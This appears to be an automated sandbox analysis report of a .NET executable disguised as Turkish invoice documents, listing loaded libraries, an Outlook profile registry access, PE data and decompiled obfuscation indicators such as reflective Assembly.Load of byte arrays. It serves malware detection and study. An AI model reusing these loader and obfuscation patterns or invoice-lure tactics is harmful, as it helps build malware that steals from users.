                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: FATURA VE BELGELER..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: FATURA VE BELGELER..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: FATURA VE BELGELER..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: HJbl.pdb source: FATURA VE BELGELER..exe
                  Source: Binary string: HJbl.pdbSHA256 source: FATURA VE BELGELER..exe

                  Data Obfuscation

                  barindex
                  Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.cs.Net Code: dWfbjGfwyT System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.cs.Net Code: dWfbjGfwyT System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_050384C0 push eax; iretd 0_2_050384CD
                  Source: FATURA VE BELGELER..exeStatic PE information: section name: .text entropy: 7.6979520777268835
                  Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, h0MxUAiRwfmKieeEn0.csHigh entropy of concatenated method names: 'rbXYeScFsl', 'BwXY0wXHKO', 'PphYbFbpKd', 'mj1YKs23l0', 'UyVYiMqoXZ', 'y4GYNOd3rZ', 'UVcYPrAhef', 'kxlSZs0TIO', 'hGISxij7Ha', 'vhASLiX1Ru'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, Avwu49KGxRSsoLWJIf.csHigh entropy of concatenated method names: 'oGxSDDj3tY', 'GutS1UQ9U9', 'kVYSQyuLpk', 'KdoS64TsYN', 'PqSSBPoAmC', 'PRMSfUN19n', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, or5jHvqBByl8DNsQaI.csHigh entropy of concatenated method names: 'jyFSKXkump', 'nHOSi9Fs9w', 'RyrSAZpCdp', 'KeFSNUu12I', 'tesSPEboeu', 'KEBSTcAaqO', 'lUgSvLXPYL', 'XPcSuHCKNm', 'Ia5SRMpYnh', 'DWZSJBnSbQ'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, Ce32rVukiNFuNjRUcV.csHigh entropy of concatenated method names: 'aMPVpeYSdk', 'jMNVn7Un4a', 'Q7pVDJnhen', 'ir9V1xuUq0', 'e7XV6VpuM3', 'MbfVf8llUu', 'vmrVOFC32M', 'B7LVHmMFXJ', 'tVDVFcljG2', 'I1YV5rowci'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, OAllAqXVCQegZBCPul.csHigh entropy of concatenated method names: 'U2KeTW1mNc', 'prmevVgmfR', 'EFyeRXbyKW', 'nXheJsyDDQ', 'Tq2eG8CJL9', 'Ut4ek1S8DL', 'I1qZZYS9Qw5Nt27n0F', 'ljsHEKJikqxgXYBA2T', 'uyreekKB7N', 'F1we0wgo06'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, iBFtFdGoCHLmE14Lc82.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pIZ9BDP5qa', 'LMD9aOTx8i', 'WJe9hcJOLO', 'cdr9cuZkWP', 'WBZ9oQSd2C', 'JP59X87P5I', 'uxm9ZDXkTu'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, be03F9dtp0fyw81fnC.csHigh entropy of concatenated method names: 'XFUPEMeWcG', 'C7fPiaqDfb', 'ErLPNr6MqO', 'c9YPTagRoW', 'OJVPv3AQbR', 'qioNoMOhjS', 'JapNXmNq7s', 'h9PNZlTnpF', 'FArNxLTZAw', 'JKvNLHTDQp'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, BEm2Jp6mHTFCaiDYj3.csHigh entropy of concatenated method names: 'zExiBK0oIZ', 'wPSialf2qX', 'yHtihnE5QX', 'zNCiccnUOu', 'wFuioUdUMn', 'b7qiXCXVdk', 'ceRiZ66b95', 'G6UixtD69X', 'UL2iLU9A0f', 'lVpiwBfWtv'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, pnilJbS9iaxlHxnHSk.csHigh entropy of concatenated method names: 'AChjVoqn4', 'ghoriI7De', 'pWeUtWK6S', 'BLcI1iHwl', 'P5innUOIx', 'anvCU5DXl', 'dwoUdgT4yPSGYCLUX8', 'nyIBBCRJLC8FTFqarl', 'GOPS5PVrv', 'y3X9fuJPs'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, FIvlf4GCjOLwyghDjKM.csHigh entropy of concatenated method names: 'iODYqGl18J', 'yrcYdaxf0O', 'wcqYj1ZEY5', 'nFuYrp7ppq', 'sN3YWo3c48', 'HslYUTjl9k', 'LiTYIK9Jlg', 'FITYpZDxJ1', 'H09YnNkYGU', 'uhtYCKsO3l'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, bfByhCz8pWFqRTYI4g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDbYVPE76L', 'tGDYGQQ9Fd', 'WS3YkoF1cZ', 'xe0Y21cg0h', 'VIhYSBtcc7', 'vf7YYd899e', 'XSGY9HrkTt'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, xQA61fJ7NhNeg5aON1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cFQyL5AecR', 'XWFywAbT3S', 'KxoyzZv4oK', 'yh60giZU8q', 'zkS0eDYM7h', 'cFF0yd476f', 'OO400pQCI0', 'wDnKHCCoZQqWQRxxSxd'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, LSdbflccGPGDq3hcQ1.csHigh entropy of concatenated method names: 'E8a2xvma2v', 'X5w2wiLD2P', 'mpxSgokIYZ', 'BepSekx8SK', 'c2A25y71FC', 'CfO2sIl2D7', 'YLG27uAdVJ', 'tdc2BUUFg2', 'xmX2a46BSH', 'uUV2hUIRgH'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, NyZSOB4emBHrtDpvVc.csHigh entropy of concatenated method names: 'CZYGFwiwt6', 'mBMGsCLGL0', 'HFkGBTJeoR', 'ALQGam3yxa', 'nrRG1lllq2', 'mEpGQ92WdH', 'DgWG66mcTa', 'sYVGf4gXNT', 'OMsG4xkEWf', 'KcFGO41JW9'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, RcFJLiEkFyke2NNnM7.csHigh entropy of concatenated method names: 'Dispose', 'rU4eLPUENk', 'Y3by1iM7TJ', 'Nds33YHHnC', 'QXSewn4aHQ', 'rNXez0Mkih', 'ProcessDialogKey', 'OMJygO1IXu', 'TjYye1W20g', 'aktyyZlFv1'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, CSLTMP26Mw8dlwhdX5.csHigh entropy of concatenated method names: 'fKWArfwwac', 'aytAUrhRm5', 'iANApk2GKU', 'z7sAnIPgr1', 'ajgAGO4hu8', 'D8bAk1eoCS', 'fcIA2xf6YE', 'YAXAS0FYBd', 'QjkAY4yPJF', 'AY4A9XUsBX'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, OUtb2jIJCbA1FRbDy9.csHigh entropy of concatenated method names: 'ToString', 'MSMk5149hg', 'CIxk13rDHS', 'TbNkQtmBD7', 'TVEk6CnLYp', 'PRjkflrtg4', 'XJkk4UnlDw', 'KurkOaIdMU', 'l3pkHbQ7YG', 'JQxk8pCgUn'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, XtRbDC8sv0rhqYhjUZ.csHigh entropy of concatenated method names: 'I2iTKbWYsU', 'VlLTAnNDog', 'sKdTPvt4yS', 'CE6PwnOirv', 'qZSPzGDNED', 'YxdTgcCSUw', 'vEDTeMyxkx', 'dJcTya9W9t', 'v14T0oL94N', 'gOjTbO31mf'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, SdBFpEBHlyXFcTvND6.csHigh entropy of concatenated method names: 'MsCTqGkCLt', 'V8iTdtQoMP', 'Wu2TjqQgHw', 'POSTrkLVG2', 'WUsTWKlAnN', 'hQ5TUru0tM', 'wQpTItbv1J', 'KRBTpqGv6G', 'SwlTnsci9e', 'r4bTCIrsG6'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, zFqOfCW7G8bv0AyfDi.csHigh entropy of concatenated method names: 'uuR2RyqL1C', 'gOd2JB0iXv', 'ToString', 'bJU2KycpkI', 'PrF2inUmgO', 'ITP2AhbSSR', 'oFo2NgbQ4K', 'GQJ2PfCl8f', 'Hg62T5HVEf', 'btx2vxCahq'
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.csHigh entropy of concatenated method names: 'cHJ0Emn0Tj', 'zHi0KqCsy4', 'x020iV0Qy2', 'G9i0A9ucDX', 'w1A0N500HA', 'SkO0PrC660', 'KWe0TGhteO', 'euZ0v9InP3', 'W400uKkqUj', 'zTZ0RVUF0u'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, h0MxUAiRwfmKieeEn0.csHigh entropy of concatenated method names: 'rbXYeScFsl', 'BwXY0wXHKO', 'PphYbFbpKd', 'mj1YKs23l0', 'UyVYiMqoXZ', 'y4GYNOd3rZ', 'UVcYPrAhef', 'kxlSZs0TIO', 'hGISxij7Ha', 'vhASLiX1Ru'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, Avwu49KGxRSsoLWJIf.csHigh entropy of concatenated method names: 'oGxSDDj3tY', 'GutS1UQ9U9', 'kVYSQyuLpk', 'KdoS64TsYN', 'PqSSBPoAmC', 'PRMSfUN19n', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, or5jHvqBByl8DNsQaI.csHigh entropy of concatenated method names: 'jyFSKXkump', 'nHOSi9Fs9w', 'RyrSAZpCdp', 'KeFSNUu12I', 'tesSPEboeu', 'KEBSTcAaqO', 'lUgSvLXPYL', 'XPcSuHCKNm', 'Ia5SRMpYnh', 'DWZSJBnSbQ'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, Ce32rVukiNFuNjRUcV.csHigh entropy of concatenated method names: 'aMPVpeYSdk', 'jMNVn7Un4a', 'Q7pVDJnhen', 'ir9V1xuUq0', 'e7XV6VpuM3', 'MbfVf8llUu', 'vmrVOFC32M', 'B7LVHmMFXJ', 'tVDVFcljG2', 'I1YV5rowci'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, OAllAqXVCQegZBCPul.csHigh entropy of concatenated method names: 'U2KeTW1mNc', 'prmevVgmfR', 'EFyeRXbyKW', 'nXheJsyDDQ', 'Tq2eG8CJL9', 'Ut4ek1S8DL', 'I1qZZYS9Qw5Nt27n0F', 'ljsHEKJikqxgXYBA2T', 'uyreekKB7N', 'F1we0wgo06'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, iBFtFdGoCHLmE14Lc82.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pIZ9BDP5qa', 'LMD9aOTx8i', 'WJe9hcJOLO', 'cdr9cuZkWP', 'WBZ9oQSd2C', 'JP59X87P5I', 'uxm9ZDXkTu'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, be03F9dtp0fyw81fnC.csHigh entropy of concatenated method names: 'XFUPEMeWcG', 'C7fPiaqDfb', 'ErLPNr6MqO', 'c9YPTagRoW', 'OJVPv3AQbR', 'qioNoMOhjS', 'JapNXmNq7s', 'h9PNZlTnpF', 'FArNxLTZAw', 'JKvNLHTDQp'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, BEm2Jp6mHTFCaiDYj3.csHigh entropy of concatenated method names: 'zExiBK0oIZ', 'wPSialf2qX', 'yHtihnE5QX', 'zNCiccnUOu', 'wFuioUdUMn', 'b7qiXCXVdk', 'ceRiZ66b95', 'G6UixtD69X', 'UL2iLU9A0f', 'lVpiwBfWtv'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, pnilJbS9iaxlHxnHSk.csHigh entropy of concatenated method names: 'AChjVoqn4', 'ghoriI7De', 'pWeUtWK6S', 'BLcI1iHwl', 'P5innUOIx', 'anvCU5DXl', 'dwoUdgT4yPSGYCLUX8', 'nyIBBCRJLC8FTFqarl', 'GOPS5PVrv', 'y3X9fuJPs'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, FIvlf4GCjOLwyghDjKM.csHigh entropy of concatenated method names: 'iODYqGl18J', 'yrcYdaxf0O', 'wcqYj1ZEY5', 'nFuYrp7ppq', 'sN3YWo3c48', 'HslYUTjl9k', 'LiTYIK9Jlg', 'FITYpZDxJ1', 'H09YnNkYGU', 'uhtYCKsO3l'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, bfByhCz8pWFqRTYI4g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDbYVPE76L', 'tGDYGQQ9Fd', 'WS3YkoF1cZ', 'xe0Y21cg0h', 'VIhYSBtcc7', 'vf7YYd899e', 'XSGY9HrkTt'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, xQA61fJ7NhNeg5aON1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cFQyL5AecR', 'XWFywAbT3S', 'KxoyzZv4oK', 'yh60giZU8q', 'zkS0eDYM7h', 'cFF0yd476f', 'OO400pQCI0', 'wDnKHCCoZQqWQRxxSxd'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, LSdbflccGPGDq3hcQ1.csHigh entropy of concatenated method names: 'E8a2xvma2v', 'X5w2wiLD2P', 'mpxSgokIYZ', 'BepSekx8SK', 'c2A25y71FC', 'CfO2sIl2D7', 'YLG27uAdVJ', 'tdc2BUUFg2', 'xmX2a46BSH', 'uUV2hUIRgH'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, NyZSOB4emBHrtDpvVc.csHigh entropy of concatenated method names: 'CZYGFwiwt6', 'mBMGsCLGL0', 'HFkGBTJeoR', 'ALQGam3yxa', 'nrRG1lllq2', 'mEpGQ92WdH', 'DgWG66mcTa', 'sYVGf4gXNT', 'OMsG4xkEWf', 'KcFGO41JW9'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, RcFJLiEkFyke2NNnM7.csHigh entropy of concatenated method names: 'Dispose', 'rU4eLPUENk', 'Y3by1iM7TJ', 'Nds33YHHnC', 'QXSewn4aHQ', 'rNXez0Mkih', 'ProcessDialogKey', 'OMJygO1IXu', 'TjYye1W20g', 'aktyyZlFv1'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, CSLTMP26Mw8dlwhdX5.csHigh entropy of concatenated method names: 'fKWArfwwac', 'aytAUrhRm5', 'iANApk2GKU', 'z7sAnIPgr1', 'ajgAGO4hu8', 'D8bAk1eoCS', 'fcIA2xf6YE', 'YAXAS0FYBd', 'QjkAY4yPJF', 'AY4A9XUsBX'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, OUtb2jIJCbA1FRbDy9.csHigh entropy of concatenated method names: 'ToString', 'MSMk5149hg', 'CIxk13rDHS', 'TbNkQtmBD7', 'TVEk6CnLYp', 'PRjkflrtg4', 'XJkk4UnlDw', 'KurkOaIdMU', 'l3pkHbQ7YG', 'JQxk8pCgUn'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, XtRbDC8sv0rhqYhjUZ.csHigh entropy of concatenated method names: 'I2iTKbWYsU', 'VlLTAnNDog', 'sKdTPvt4yS', 'CE6PwnOirv', 'qZSPzGDNED', 'YxdTgcCSUw', 'vEDTeMyxkx', 'dJcTya9W9t', 'v14T0oL94N', 'gOjTbO31mf'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, SdBFpEBHlyXFcTvND6.csHigh entropy of concatenated method names: 'MsCTqGkCLt', 'V8iTdtQoMP', 'Wu2TjqQgHw', 'POSTrkLVG2', 'WUsTWKlAnN', 'hQ5TUru0tM', 'wQpTItbv1J', 'KRBTpqGv6G', 'SwlTnsci9e', 'r4bTCIrsG6'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, zFqOfCW7G8bv0AyfDi.csHigh entropy of concatenated method names: 'uuR2RyqL1C', 'gOd2JB0iXv', 'ToString', 'bJU2KycpkI', 'PrF2inUmgO', 'ITP2AhbSSR', 'oFo2NgbQ4K', 'GQJ2PfCl8f', 'Hg62T5HVEf', 'btx2vxCahq'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.csHigh entropy of concatenated method names: 'cHJ0Emn0Tj', 'zHi0KqCsy4', 'x020iV0Qy2', 'G9i0A9ucDX', 'w1A0N500HA', 'SkO0PrC660', 'KWe0TGhteO', 'euZ0v9InP3', 'W400uKkqUj', 'zTZ0RVUF0u'
                  Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
